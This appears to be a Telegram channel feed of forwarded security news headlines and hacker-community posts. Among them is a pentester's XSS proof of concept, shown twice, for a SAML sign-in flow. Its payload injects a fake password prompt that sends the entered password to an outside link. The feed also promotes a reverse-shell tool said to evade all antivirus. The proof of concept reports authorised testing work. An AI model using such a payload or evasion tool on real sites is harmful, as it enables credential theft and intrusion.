Forwarded from DailyCVE
🔴 Cleo Harmony, VLTrader, LexiCom Unrestricted File Upload and Download (#CVE-XXXX-XXXX) (Critical)
https://dailycve.com/cleo-harmony-vltrader-lexicom-unrestricted-file-upload-and-download-cve-xxxx-xxxx-critical/
@Daily_CVE
https://dailycve.com/cleo-harmony-vltrader-lexicom-unrestricted-file-upload-and-download-cve-xxxx-xxxx-critical/
@Daily_CVE
DailyCVE
Cleo Harmony, VLTrader, LexiCom Unrestricted File Upload and Download (CVE-XXXX-XXXX) (Critical) - DailyCVE
2024-12-13 : This article discusses a critical vulnerability (CVE-XXXX-XXXX) affecting Cleo Harmony, VLTrader, and LexiCom versions prior to 5.8.0.21. The […]
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
🦑How run the Password Reset Flaw | Live PoC - New method
Ref: Rohith S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Ref: Rohith S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
⚠️ German Authorities Neutralize BadBox #Malware Affecting 30,000 Devices
https://undercodenews.com/german-authorities-neutralize-badbox-malware-affecting-30000-devices/
@Undercode_News
https://undercodenews.com/german-authorities-neutralize-badbox-malware-affecting-30000-devices/
@Undercode_News
UNDERCODE NEWS
German Authorities Neutralize BadBox Malware Affecting 30,000 Devices - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🚨 Critical Cleo File Transfer #Software Flaw Exploited in #Ransomware Attacks
https://undercodenews.com/critical-cleo-file-transfer-software-flaw-exploited-in-ransomware-attacks/
@Undercode_News
https://undercodenews.com/critical-cleo-file-transfer-software-flaw-exploited-in-ransomware-attacks/
@Undercode_News
UNDERCODE NEWS
Critical Cleo File Transfer Software Flaw Exploited in Ransomware Attacks - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Big Screen, Big Value: #Samsung #Galaxy Tab S9 FE+ Review - Perfect for Family Fun
https://undercodenews.com/big-screen-big-value-samsung-galaxy-tab-s9-fe-review-perfect-for-family-fun/
@Undercode_News
https://undercodenews.com/big-screen-big-value-samsung-galaxy-tab-s9-fe-review-perfect-for-family-fun/
@Undercode_News
UNDERCODE NEWS
Big Screen, Big Value: Samsung Galaxy Tab S9 FE+ Review - Perfect for Family Fun - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔐 Stealing the Secret Sauce: How Hackers Can Extract #AI Models
https://undercodenews.com/stealing-the-secret-sauce-how-hackers-can-extract-ai-models/
@Undercode_News
https://undercodenews.com/stealing-the-secret-sauce-how-hackers-can-extract-ai-models/
@Undercode_News
UNDERCODE NEWS
Stealing the Secret Sauce: How Hackers Can Extract AI Models - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE TESTING
Media is too big
VIEW IN TELEGRAM
🦑 The Official NASA CSRF Vulnerability Video
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔐 Password Spray Attacks Targeting Citrix Netscaler on the Rise
https://undercodenews.com/password-spray-attacks-targeting-citrix-netscaler-on-the-rise/
@Undercode_News
https://undercodenews.com/password-spray-attacks-targeting-citrix-netscaler-on-the-rise/
@Undercode_News
UNDERCODE NEWS
Password Spray Attacks Targeting Citrix Netscaler on the Rise - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Leveling Up Our XSS Proof of Concepts at CybaVerse :
It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).
We recently encountered an XSS vulnerability within a SAML Sign-in flow — not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
🔹 Manipulate the HTML to display a fake login prompt.
🔹 Capture user-entered passwords and send them to our server.
Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the application’s defences, this vulnerability still allowed us to:
🔹 Phish user credentials via a convincing fake prompt.
🔹 Demonstrate impact beyond simple alert pop-ups or redirects.
Here’s a snippet of the payload I crafted:
⚠️ <samlp:StatusCode Value="XSS POC';document.body.innerHTML='<br><h1>Authentication failed, re-enter your password</h1><br><form action="//https://lnkd.in/ecG5926A" method="post"><input type="password" name="password"><br><button type="submit">Submit</button></form>'+document.body.innerHTML;&"/> ⚠️
The image below shows the entered password if someone fell for the prompt: “Authentication failed, re-enter your password.”
Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.
Ref: Michael Jepson
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).
We recently encountered an XSS vulnerability within a SAML Sign-in flow — not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
🔹 Manipulate the HTML to display a fake login prompt.
🔹 Capture user-entered passwords and send them to our server.
Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the application’s defences, this vulnerability still allowed us to:
🔹 Phish user credentials via a convincing fake prompt.
🔹 Demonstrate impact beyond simple alert pop-ups or redirects.
Here’s a snippet of the payload I crafted:
⚠️ <samlp:StatusCode Value="XSS POC';document.body.innerHTML='<br><h1>Authentication failed, re-enter your password</h1><br><form action="//https://lnkd.in/ecG5926A" method="post"><input type="password" name="password"><br><button type="submit">Submit</button></form>'+document.body.innerHTML;&"/> ⚠️
The image below shows the entered password if someone fell for the prompt: “Authentication failed, re-enter your password.”
Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.
Ref: Michael Jepson
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🚨 Cleo Zero-Day Exploits: A Growing #Ransomware Threat
https://undercodenews.com/cleo-zero-day-exploits-a-growing-ransomware-threat/
@Undercode_News
https://undercodenews.com/cleo-zero-day-exploits-a-growing-ransomware-threat/
@Undercode_News
UNDERCODE NEWS
Cleo Zero-Day Exploits: A Growing Ransomware Threat - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Versa Strengthens SASE with Integrated Endpoint DLP
https://undercodenews.com/versa-strengthens-sase-with-integrated-endpoint-dlp/
@Undercode_News
https://undercodenews.com/versa-strengthens-sase-with-integrated-endpoint-dlp/
@Undercode_News
UNDERCODE NEWS
Versa Strengthens SASE with Integrated Endpoint DLP - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🌐 Enhanced Cyber Resilience with Zerto Cloud Vault
https://undercodenews.com/enhanced-cyber-resilience-with-zerto-cloud-vault/
@Undercode_News
https://undercodenews.com/enhanced-cyber-resilience-with-zerto-cloud-vault/
@Undercode_News
UNDERCODE NEWS
Enhanced Cyber Resilience with Zerto Cloud Vault - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🎮 Streamlining Issue Management with Enhanced #GitHub Issues
https://undercodenews.com/streamlining-issue-management-with-enhanced-github-issues/
@Undercode_News
https://undercodenews.com/streamlining-issue-management-with-enhanced-github-issues/
@Undercode_News
UNDERCODE NEWS
Streamlining Issue Management with Enhanced GitHub Issues - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from Exploiting Crew (Pr1vAt3)
🦑FREE 𝐒𝐎𝐂 𝐭𝐫𝐚𝐢𝐧𝐢𝐧𝐠𝐬:
✅Microsoft Security Operations Analyst:
https://lnkd.in/eKTXEmna
✅TryHackMe
SOC level 1: https://lnkd.in/enkunj-B
SOC level 2: https://lnkd.in/eg4znfJr
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
✅Microsoft Security Operations Analyst:
https://lnkd.in/eKTXEmna
✅TryHackMe
SOC level 1: https://lnkd.in/enkunj-B
SOC level 2: https://lnkd.in/eg4znfJr
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Bypass Virustotal detection
>> Narashima is designed to bypass both Microsoft Defender and AMSI, as well as every available AV software in VirusTotal, achieving a 0% detection rate and no high malicious behaviour rate.
This tool provides a reverse shell with unmatched stealth, making it an essential asset for cybersecurity professionals focused on security research, ethical hacking, and penetration testing.
💡 Key Highlights:
- Bypass Detection: Successfully bypasses Microsoft Defender, AMSI, and all available AV softwares with 0 detections including Google, SentinelOne, Kaspersky, Sophos.
- Zero Malicious Behavior Rate: Narashima operates without triggering any suspicious alerts.
>> Tested on : Win11 Pro
I’ve spent considerable time studying and implementing this obfuscation methodology and am thrilled with the results. Looking forward to collaborating with the community to enhance its capabilities further!
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
>> Narashima is designed to bypass both Microsoft Defender and AMSI, as well as every available AV software in VirusTotal, achieving a 0% detection rate and no high malicious behaviour rate.
This tool provides a reverse shell with unmatched stealth, making it an essential asset for cybersecurity professionals focused on security research, ethical hacking, and penetration testing.
💡 Key Highlights:
- Bypass Detection: Successfully bypasses Microsoft Defender, AMSI, and all available AV softwares with 0 detections including Google, SentinelOne, Kaspersky, Sophos.
- Zero Malicious Behavior Rate: Narashima operates without triggering any suspicious alerts.
>> Tested on : Win11 Pro
I’ve spent considerable time studying and implementing this obfuscation methodology and am thrilled with the results. Looking forward to collaborating with the community to enhance its capabilities further!
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🛡️ Steady Connections and Secure Transactions: NCC Assures No Telecom or Banking Disruptions During Elections
https://undercodenews.com/steady-connections-and-secure-transactions-ncc-assures-no-telecom-or-banking-disruptions-during-elections/
@Undercode_News
https://undercodenews.com/steady-connections-and-secure-transactions-ncc-assures-no-telecom-or-banking-disruptions-during-elections/
@Undercode_News
UNDERCODE NEWS
Steady Connections and Secure Transactions: NCC Assures No Telecom or Banking Disruptions During Elections - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
⚡️ #WhatsApp Simplifies Updates with Unified Channel and Status Creation
https://undercodenews.com/whatsapp-simplifies-updates-with-unified-channel-and-status-creation/
@Undercode_News
https://undercodenews.com/whatsapp-simplifies-updates-with-unified-channel-and-status-creation/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
⚡️ CharacterAI Gets Safer: New #AI Model for Kids and Parental Controls
https://undercodenews.com/characterai-gets-safer-new-ai-model-for-kids-and-parental-controls/
@Undercode_News
https://undercodenews.com/characterai-gets-safer-new-ai-model-for-kids-and-parental-controls/
@Undercode_News